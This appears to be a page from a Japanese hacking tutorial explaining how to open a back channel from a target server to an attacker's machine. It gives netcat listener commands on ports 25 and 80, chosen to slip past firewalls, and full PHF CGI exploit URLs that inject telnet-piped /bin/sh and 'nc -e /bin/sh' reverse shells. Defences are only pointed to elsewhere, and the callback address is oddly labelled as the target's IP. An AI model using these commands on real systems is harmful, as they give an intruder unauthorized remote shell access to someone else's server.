■リバースTelnet
リバースTelnetは、telnet(詳細は、基礎TELNET講座を参照せよ)の使用によってターゲットサーバからAttackerのシステムへバックチャンネルを作成する。詳細は、リバースTelnet利用による方法を参照してください。
■バックチャンネルの作り方
1、ncリスナーを有効にする。
[attacker-host]# nc -l -n -v -p 25
[attacker-host]# nc -l -n -v -p 80
(注意1)上のコマンドを実行する前に、ポート25と80を他のサービス(HTTPD、Sendmail)が占領してないようにしておく。もし、サービスが既にリスンしている場合、killコマンドで削除しておき、ncが各ポートにバインドされるようにする。
(注意2)何故、ポート25と80を使用するのかというと途中にファイアウォール(詳細は、基礎ファイアウォール講座を参照せよ)などがあっても25と80のやりとりが一般的に認められているからです。
2、PHFのバグを利用して、「/bin/telnet xxx.xxx.xxx.xxx(ip address of target) 80 | /bin/sh | /bin/telnet xxx.xxx.xxx.xxx(ip address of target) 25」を実行させます。ちなみに、PHFバグについては、基礎phf・php・cgi-binバグ講座を参照せよ。
以下のようにして実行する。
/cgi-bin/phf?Qalias=x%0a/bin/telnet%20xxx.xxx.xxx.xxx(ターゲットのIP)%2080%20|%20/bin/sh%20|%20/bin/telnet%20xxx.xxx.xxx.xxx(ターゲットのIP)%2025
3、バックチャンネルの作成終わり。
●ターゲットサーバに-eスイッチつきでコンパイルされたncが存在する場合の方法
1、リバースncバックチャンネルを受信できるようにする。
[attacker-host]# nc -l n -v -p 80
2、リスナを有効にしたら、リモートシステムから「nc -e /bin/sh xxx.xxx.xxx.xxx(ip address of target) 80」のコマンドを実行。
PHFバグを利用して以下を実行する。
/cgi-bin/phf?Qalias=x%0a/bin/nc%20-e%20/bin/sh%20xxx.xxx.xxx.xxx(ターゲットのIP)%2080
■対策
対策については、特別講座<バックチャンネル編>を参照してください。
■参考文献
|
|||
|
|